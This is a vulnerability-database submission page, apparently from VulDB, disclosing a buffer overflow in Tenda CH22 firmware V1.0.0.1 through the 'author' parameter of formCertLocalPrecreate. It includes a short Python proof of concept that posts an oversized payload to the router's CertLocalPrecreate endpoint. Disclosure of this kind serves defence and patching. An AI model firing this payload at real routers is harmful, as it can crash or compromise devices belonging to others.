إرسال #858000: Tenda CH22 V1.0.0.1 Buffer Overflowالمعلومات

عنوانTenda CH22 V1.0.0.1 Buffer Overflow
الوصف## Overview - Firmware download website: https://www.tenda.com.cn/download/2230 ## Affected version CH22 V1.0.0.1 ## Vulnerability details The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `formCertLocalPrecreate` function. The `V11` variable receives the `author` parameter from a POST request and is later passed to the `sprintf` function. However, since the user can control the input of `author` , the statement `sprintf(s, "CN = %s/emailAddress=%s\n", v11, v10);` can cause a buffer overflow. ## PoC ``` import requests ip = "192.168.1.1" url = f'http://{ip}/goform/CertLocalPrecreate' payload = b'a' * 1000 data = {    'author':payload } requests.post(url, data=data) ```
المصدر⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-formCertLocalPrecreate-377df0aa118580e99c96f8ecf4475563
المستخدم
 ysnysn0121 (UID 86198)
ارسال13/06/2026 04:13 PM (1 شهر منذ)
الاعتدال18/07/2026 12:08 PM (1 month later)
الحالةمكرر
إدخال VulDB355396 [Tenda CH22 1.0.0.1 Parameter CertLocalPrecreate formCertLocalPrecreate standard تلف الذاكرة]
النقاط0

Interested in the pricing of exploits?

See the underground prices here!